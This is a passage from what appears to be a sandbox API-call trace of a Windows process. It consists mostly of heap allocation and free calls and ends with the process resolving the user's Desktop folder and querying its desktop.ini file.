Flags=0x0, Size=0x10) returned 0x24a95d0 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0163.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0163.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0163.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0163.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0163.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0163.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.701] CloseHandle (hObject=0x1e8) returned 1 [0163.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0163.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0163.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0163.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0163.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0163.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0163.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0163.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0163.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0163.702] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0163.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0163.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0163.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0163.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0163.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0163.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0163.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0163.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0163.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0163.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0163.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0163.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0163.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0163.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0163.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0163.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.704] CloseHandle (hObject=0x170) returned 1 [0163.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0163.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0163.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0163.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0163.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0163.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0163.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0163.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0163.707] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0163.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0163.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0163.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0163.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0163.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0163.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0163.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0163.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0163.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0163.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0163.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0163.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0163.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0163.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0163.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0163.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0163.711] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0163.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0163.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0163.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0163.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0163.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0163.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0163.711] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0163.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0163.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0163.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0163.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0163.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0163.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0163.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.712] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0163.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0163.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0163.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0163.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0163.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0163.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0163.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0163.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0163.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0163.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0163.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0163.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0163.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0163.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0163.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0163.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0163.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0163.713] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpFilePart=0x8bedfc*="desktop.ini") returned 0x31 [0163.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0163.713] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini")) returned 0x26 [0163.713] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpFindFileData=0x8bf030 | out: 